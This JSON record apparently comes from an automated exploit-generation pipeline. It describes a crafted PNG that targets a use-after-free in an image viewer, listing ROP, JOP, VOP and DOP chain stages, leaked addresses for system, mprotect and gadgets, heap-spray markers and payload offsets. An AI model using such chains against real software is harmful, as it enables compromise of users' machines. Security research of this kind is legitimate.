{
  "file": "sample_9.png.eog.uaf.VOP.png",
  "fuzz_type": "uaf",
  "chain_type": "VOP",
  "unique_id": "pwned_png_consumer_uaf_1783725431_0",
  "attack_chain": [
    "VOP_LDR_STR_Q0",
    "VOP_FMOV_STR",
    "DOP_VECTOR_COPY",
    "ROP_UAF",
    "JOP_UAF",
    "VOP_UAF",
    "DOP_UAF"
  ],
  "leaked_addresses": {
    "mprotect": "0xfc67b2fc7c00",
    "system": "0xfc67b2f2cec4",
    "payload": "0xb29a25920100",
    "pop_x0_x1_x2_ret": "0xb29a25901c20",
    "ldp_x29_x30": "0xb29a25901c30",
    "pop_x0_x1_x2_x30_br_x0": "0xb29a25901c40",
    "jump_x0": "0xb29a25901c50",
    "load_mprotect_x3": "0xb29a25901c60",
    "load_payload_x0": "0xb29a25901c70",
    "br_x3": "0xb29a25901c80",
    "ldr_x0_x1_br_x0": "0xb29a25901c90",
    "mov_x0_x1_br_x0": "0xb29a25901ca0",
    "ldr_x1_x0_br_x1": "0xb29a25901cb0",
    "mov_x1_x0_br_x1": "0xb29a25901cc0",
    "pop_x0_x1_ret": "0xb29a25901cd0",
    "pop_x0_ret": "0xb29a25901ce0",
    "pop_x1_ret": "0xb29a25901cf0",
    "ldr_x0_sp_br_x0": "0xb29a25901d00",
    "ldr_x1_sp_br_x1": "0xb29a25901d10",
    "gadget_vop_fmov": "0xb29a25901d60",
    "gadget_vop_ldr_str_q0": "0xb29a25901d70",
    "gadget_mov_x0_x1_br_x0": "0xb29a25901ca0",
    "gadget_ldr_x0_x1_br_x0": "0xb29a25901c90"
  },
  "instrumentation_validation": {
    "valid": true,
    "issues": [],
    "warnings": [
      "Multiple FITNESS_OK markers found (3), expected during heap spray - keeping last occurrence only"
    ],
    "embeddings": {
      "ROP chain": 2956114,
      "JOP chain": 2956179,
      "VOP chain": 2955910,
      "DOP chain": 2956020
    },
    "missing_triggers": [],
    "payload_integrity": true,
    "doubtful_fitness_markers": [
      2956550,
      2957213
    ]
  },
  "trigger_alignment": {
    "aligned": true,
    "trigger_offset": 2957236,
    "payload_offset": 2960476,
    "gap_bytes": 3240,
    "alignment_quality": "acceptable",
    "recommendations": [],
    "trigger_type": "uaf",
    "payload_slide": 0
  }
}